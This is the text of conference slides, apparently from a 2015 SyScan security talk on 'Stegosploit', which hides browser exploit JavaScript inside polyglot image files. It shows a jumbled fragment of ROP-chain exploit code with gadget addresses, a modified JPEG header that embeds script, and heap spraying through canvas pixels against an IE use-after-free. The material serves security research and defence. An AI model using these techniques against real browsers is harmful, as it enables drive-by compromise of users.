Hacking

With
Pictures
Saumil Shah
SyScan 2015
net-square

About Me
Saumil Shah

CEO, Net-Square

@therealsaumil
saumilshah
hacker, trainer, speaker,
author, photographer
educating, entertaining and
exasperating audiences
since 1999
net-square

Hiding In Plain Sight

net-square

Images are
INNOCENT!

net-square

 Steganography
GIFAR
concatenation

PHP/ASP webshells
appending tags
<?php..?> <%..%>

A bit of History
net-square

XSS in EXIF data

Attack
Payload

SAFE
decoder
DANGEROUS
Pixel Data

Dangerous Content Is ...Dangerous

net-square

r e

e t

net-square

g s

s s

a l

k e

I'm an evil Javascript

I'm an innocent image

net-square

function packv(n)
{var s=new
Number(n).toStri
ng(16);while(s.l
ength<8)s="0"+s;
scape("%u"+s.sub
return(une
string(4,8)+"%u"
+s.substring(0,4
addressof=new
)))}var
Array();addresso
f["ropnop"]=0x6d
81bdf0;addressof
_esp_ret"]=0x6d8
["xchg_eax
1bdef;addressof[
"pop_eax_ret"]=0
addressof["pop_e
x6d906744;
cx_ret"]=0x6d81c
d57;addressof["m
x_ret"]=0x6d9797
ov_peax_ec
20;addressof["mo
v_
eax_pecx_ret"]=0
0;addressof["mov
x6d8d7be
_pecx_eax_ret"]=
0x6d8eee01;addre
eax_ret"]=0x6d83
ssof["inc_
8f54;addressof["
add_eax_4_ret"]=
;addressof["call
0x00000000
_peax_ret"]=0x6d
8a
ec31;addressof["
24_ret"]=0x00000
add_esp_
000;addressof["p
opad_ret"]=0x6d8
essof["call_peax
2a8a1;addr
"]=0x6d802597;fu
nction
call_ntallocatev
irtualmemory(bas
eptr,size,callnu
ropnop=packv(add
m){var
ressof["ropnop"]
);var
pop_eax_ret=pack
v(addressof["pop
_eax_ret"]);var
pop_ecx_ret=pack
v(addressof["pop
_ecx_ret"]);var
mov_peax_ecx_ret
=packv(addressof
["mov_peax_ecx_r
mov_eax_pecx_ret
et"]);var
=packv(addressof
["mov_eax_pecx_r
mov_pecx_eax_ret
et"]);var
=packv(addressof
["mov_pecx_eax_r
call_peax_ret=pa
et"]);var
ckv(addressof["c
all_peax_ret"]);
add_esp_24_ret=p
va
r
ackv(addressof["
add_esp_24_ret"]
popad_ret=packv(
);var
addressof["popad
_ret"]);var retv
al=""!

<CANVAS>

net-square

Avoid the EVIL eval()

var a = eval(str);
a = (new Function(str))();
net-square

Hat tip: Dr. Mario Heiderich @0x6D6172696F

Theory Becomes Practice - 2014

net-square

Hiding In Plain Sight

I SEE PIXELS

IMAJS
net-square

I SEE CODE

IMAJS The Concept

<img> sees pixels
<script> sees code
#YourPointOfView

Image

net-square

Javascript

Holy
Sh**
Bipolar
Content!

Cross Container Scripting - XCS

<img src="itsatrap.gif">
<script src="itsatrap.gif">
</script>

net-square

IMAJS-GIF Browser Support

Height

Width

Browser/Viewer

Image
Renders?

Javascript
Executes?

2f 2a

00 00

Firefox

yes

yes

2f 2a

00 00

Safari

yes

yes

2f 2a

00 00

IE

no

yes

2f 2a

00 00

Chrome

yes

yes

2f 2a

00 00

Opera

2f 2a

00 00

Preview.app

yes

2f 2a

00 00

XP Image Viewer

no

2f 2a

00 00

Win 7 Preview

yes

net-square

IMAJS-BMP Browser Support

Height

Width

Browser/Viewer

Image
Renders?

Javascript
Executes?

2f 2a

00 00

Firefox

yes

yes

2f 2a

00 00

Safari

yes

yes

2f 2a

00 00

IE

yes

yes

2f 2a

00 00

Chrome

yes

yes

2f 2a

00 00

Opera

yes

yes

2f 2a

00 00

Preview.app

yes

2f 2a

00 00

XP Image Viewer

yes

2f 2a

00 00

Win 7 Preview

yes

net-square

Popular Image Formats

IMAJS

BMP

GIF

PNG

JPG

Easy

Easy

Hard

Hard

Alpha
<CANVAS>
Colours
Extra Data

net-square

?
RGB

Paletted

(00 in header)

(Lossy)

Yes

No

Yes

Yes

RGB

RGB
EXIF

All new IMAJS-JPG!

JPG

JPG +JS +HTML +CSS

net-square

Hat tip: Michael Zalewski @lcamtuf

The Secret Sauce

shhh..
don't tell
anyone

net-square

The Secret Sauce

Regular JPEG Header
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C
Start marker

length

"J F I F \0"

01 2C 00 00 FF E2 ...
next section...

Modied JPEG Header

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C
Start marker

length

"J F I F \0"

01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ...
whole lot of extra space!
net-square

next section...

The Secret Sauce

Modied JPEG Header
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C
Start marker

length

"J F I F \0"

01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ...
whole lot of extra space!

next section...

See the dierence?

FF D8 FF E0

/*

Start marker

comment!

4A 46 49 46 00 01 01 01 01 2C

01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ...
Javascript goes here
net-square

next section...

net-square

HTML5 for Exploit Dev

jscript9.dll introduced many changes.
No %u0000 in strings.
No 0x00000000 in strings.

Kills conventional Heap Sprays.

<CANVAS> to the rescue!
IE9 and above "support" HTML5.
<!DOCTYPE html>

net-square

CANVAS for Exploit Dev

Heap Sprays through Pixel Arrays!
No character restrictions.
All pixels treated equally!

And a bonus... ALPHA CHANNELS.

net-square

Stegosploit!

net-square

MS14-035 CInput Use-After-Free

IMAJS

net-square

stego

PWN!

< PAYLOADS GO
back in time

net-square

< ATTACK TIMELINE

I'M IN UR BASE
GET /lolcat.png
200 OK

....KILLING UR DOODZ
GET /decoder.jpg
200 OK
GET /lolcat.png
304 Not Modied

JS Exploit code
encoded in PNG.
EVIL

Decoder script references PNG

from cache.
SAFE

OCT 2014

FEB 2015

net-square

Conclusions - Oensive
Lot of possibilities!
Weird containers, weird encoding, weird
obfuscation.
Image attacks emerging "in the wild".
Not limited to just browsers.

net-square

Conclusions - Defensive
DFIR nightmare.
how far back does your window of
inspection go?

Can't rely on extensions, le headers,

MIME types or magic numbers.
Wake up call to browser-wallahs.

net-square

Greets!
Michael Zalewski
@lcamtuf
Ange Albertini
@corkami
@zer0mem
Mario Heiderich
@0x6D6172696F
Thomas Lim
@thomas_coseinc
@SyScan crew!
net-square

Photogra
phy
by
Saumil S
hah

THE
END
Saumil
Shah
@therealsaumil
saumilshah
saumil@net-square.com
net-square

See you at
#SYSCAN16
#syscanmustnotdie